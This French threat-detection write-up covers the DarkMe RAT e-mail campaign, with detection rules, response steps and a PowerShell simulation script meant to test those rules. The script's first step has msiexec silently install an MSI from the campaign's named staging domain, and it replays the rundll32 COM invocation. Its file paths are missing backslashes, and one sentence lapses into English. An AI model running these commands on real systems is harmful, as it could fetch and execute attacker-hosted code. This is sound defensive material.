La campagne d’e-mails DarkMe élargit sa cible dans les attaques APT avec RAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Une nouvelle campagne livrant le spyware RAT DarkMe a été observée en s’appuyant sur l’ingénierie sociale plutôt que sur les failles logicielles. Les attaquants distribuent un .pif fichier par email, qui initie une chaîne d’infection multi-étapes impliquant MSIEXEC et plusieurs chargeurs basés sur VB6. Le passage de l’exploitation de zero-day à l’ingénierie sociale à grande échelle suggère un glissement vers des méthodes d’attaque moins coûteuses, plus larges et moins sélectives.
Investigation
Huntress a identifié la campagne après avoir détecté un .pif fichier déclenchant Windows Installer pour récupérer un package MSI distant. L’analyse a découvert une chaîne complexe en plusieurs étapes impliquant un script de mise en scène nommé prnfig.wsf, des importations de registre, et l’exécution d’un objet COM via rundll32.exe /sta. L’étape finale utilise le creusement de processus pour injecter la charge utile DarkMe dans le binaire signé Microsoft clspack.exe.
Réduction
Les défenseurs devraient surveiller rundll32.exe lancé avec le /sta drapeau et un GUID sans chemin de DLL accompagnant. Les équipes de sécurité devraient également détecter msiexec récupérant des packages MSI distants sur HTTPS et enquêter sur l’exécution de .pif fichiers. Les binaires Microsoft signés exécutés depuis des emplacements inhabituels tels que %AppData% devraient faire l’objet d’une surveillance supplémentaire.
Réponse
Lorsqu’une activité suspecte est détectée, isolez immédiatement le point de terminaison affecté pour interrompre la communication C2 et empêcher l’exfiltration des données. Terminez le processus creusé et supprimez les artefacts malveillants de clspack.exe process and remove malicious artifacts from %AppData%ComponentsFolder and %AppData%Microsoft. Supprimez la persistance créée via le gestionnaire de protocole URL personnalisé et la clé HKCU Run . Réinitialisez les identifiants utilisateur affectés et considérez tout portefeuille de cryptomonnaie stocké localement comme potentiellement compromis.
Flux d’Attaque
Nous mettons encore à jour cette partie.
Détections
Points de Persistance Possibles [ASEPs – Registre Software/NTUSER] (via événement de registre)
Extension Inhabituelle du Binaire Exécutable (via création de processus)
LOLBAS WScript / CScript (via création de processus)
Tentative d’Installation de Fichier MSI Distant Possible (via ligne de commande)
Commande et Contrôle Suspicieux par Requête DNS de Domaine de Premier Niveau (TLD) Inhabituelle (via dns)
IOC (HashSha256) pour détecter : la Campagne d’Email DarkMe Élargit le Ciblage pour le RAT APT
IOC (SourceIP) pour détecter : la Campagne d’Email DarkMe Élargit le Ciblage pour le RAT APT
IOC (DestinationIP) pour détecter : la Campagne d’Email DarkMe Élargit le Ciblage pour le RAT APT
Détection de Communication C2 et Domaine de Staging pour le RAT DarkMe [Connexion Réseau Windows]
Détection des Activités de Campagne Malveillante de RAT DarkMe [Création de Processus Windows]
Exécution de Simulation
-
Narratif de l’Attaque & Commandes: L’adversaire vise à déployer le RAT DarkMe pour maintenir la persistance. Pour échapper à la détection basée sur les signatures, l’attaquant utilise
msiexecpour récupérer une charge utile distante depuis un domaine compromis (onlineview365.com). Suite à l’infection initiale, l’attaquant utiliserundll32.exepour invoquer un objet COM spécifique via un GUID pour exécuter le code en mémoire, et ensuite utilisecmd.exepour importer des configurations de registre à partir d’un fichier texte pour préparer l’environnement pour une exécution de charge utile basée surwscript.exe. -
Script de Test de Régression :
# Script de Simulation de DarkMe RAT # Ce script simule les lignes de commande exactes définies dans la règle Sigma. Write-Host "[+] Démarrage de la Simulation du RAT DarkMe..." -ForegroundColor Cyan # 1. Simuler le téléchargement distant de msiexec Write-Host "[*] Simulation du téléchargement distant de msiexec..." Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue # 2. Simuler l'exécution de l'objet COM avec rundll32 Write-Host "[*] Simulation de l'exécution de rundll32 COM..." Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue # 3. Simuler l'importation de registre avec cmd.exe Write-Host "[*] Simulation de l'importation de registre avec cmd.exe..." $tempFile = "$env:TEMPfiletext2.txt" "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait # 4. Simuler l'exécution de wscript.exe via la chaîne parent/rundll32 Write-Host "[*] Simulation de l'exécution de wscript.exe depuis AppData..." $scriptPath = "$env:APPDATAmalicious_script.vbs" "WScript.Echo `"DarkMe Simulée`"" | Out-File -FilePath $scriptPath -Encoding ascii # Pour déclencher la règle parent/enfant spécifique : # Parent : C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} # Enfant : wscript.exe %AppData%malicious_script.vbs Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait Write-Host "[+] Simulation Terminée." -ForegroundColor Green -
Commandes de Nettoyage :
# Nettoyer les Artéfacts de Simulation Write-Host "[+] Nettoyage..." -ForegroundColor Yellow Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue Write-Host "[+] Nettoyage Terminé." -ForegroundColor Green